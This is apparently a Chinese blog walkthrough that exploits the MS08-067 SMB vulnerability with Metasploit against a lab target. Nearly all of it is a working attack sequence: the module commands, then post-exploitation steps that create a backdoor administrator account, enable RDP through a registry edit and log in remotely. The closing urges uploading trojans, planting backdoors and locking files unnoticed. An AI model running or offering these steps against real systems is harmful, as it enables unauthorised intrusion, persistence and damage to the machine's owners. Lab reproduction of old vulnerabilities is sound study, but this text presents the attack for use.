一、漏洞简介
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。
二、环境简介
靶机:windwos2013
靶机ip:10.0.0.7
三、漏洞还原
1、进行msf
msfconsole
2、查询漏洞
search ms08_067
3、进入漏洞模块
use exploit/windows/smb/ms08_067_netapi
4、 查看攻击使用方法
show options
5、查看影响版本和其他信息
info
6、设置靶机ip
set RHOSTS 10.0.0.7
7、检查对端是否存在漏洞
msf5 exploit(windows/smb/ms08_067_netapi) > check
[+] 10.0.0.7:445 - The target is vulnerable.
8、 开始攻击
exploit
9、 查看sessions
sessions -i
10、 其他命令
back 返回上一层
banner 查看系统信息
11、提权和开通远程登录端口
创建用户并提权
输入命令net user kali kali123 /add,创建用户kali ,密码为 kali123 (用户和密码可自由填写, 注密码必须是字母加数字) 。因为我已经创建过了,所以提示用户已存在!
将root用户添加到管理员组 ,输入命令net localgroup administrators kali /add。
由于 kali 中文版显示为乱码(建议安装英文版),所以直接在靶子 机上查看是否提权成功 !在靶机命令行直接输入net localgroup administrators就可以查看。如果有kali,说明提权成功!
开启远程桌面:开启3389端口
在shell下输入以下命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " "Server /v fDenyTSConnections /t REG_DWORD /d 0000000 0 /f
输入netstat –an 查看是否开启成功
使得目标靶机开启3389端口之后,我们就能远程登陆靶机了,新开一个终端输入rdesktop -f -a 16 IP:3389(IP为靶子机地 址),Rdesktop在kali下是默认安装的,如果没有安装,在终端输入命 令apt-get install rdesktop 进行安装。
通过远程登陆靶机之后,就可以干你想干的事了,上传木马啊,留后门啊,锁文件啊,之类的。之后的就凭自己想象了!关键是,这都是在靶机不知不觉中进行的!
有问题请加博主微信进行沟通!
全部评论